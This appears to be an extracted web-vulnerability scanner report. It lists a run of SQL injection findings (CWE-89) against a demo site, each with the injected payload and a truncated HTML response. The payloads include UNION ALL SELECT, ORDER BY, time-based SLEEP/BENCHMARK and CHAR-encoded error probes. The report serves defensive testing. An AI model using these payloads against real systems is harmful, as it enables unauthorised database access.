href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #467\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #468\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' or ''-'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #469\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 28#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #470\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 29--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.ioCWE-ID CWE-89\nIssue Number #471\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+\nCHAR(116)+CHAR(69)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #472\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+\nCHAR(116)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #473\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAnD SLEEP(5)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.ioCWE-ID CWE-89\nIssue Number #474\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io (SELECT * FROM (SELECT(SLEEP(5)))ecMj)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #475\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\")) or sleep(5)=\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #476\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #477\nSQL InjectionScan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #478\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' or ''*'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #479\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #480\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" 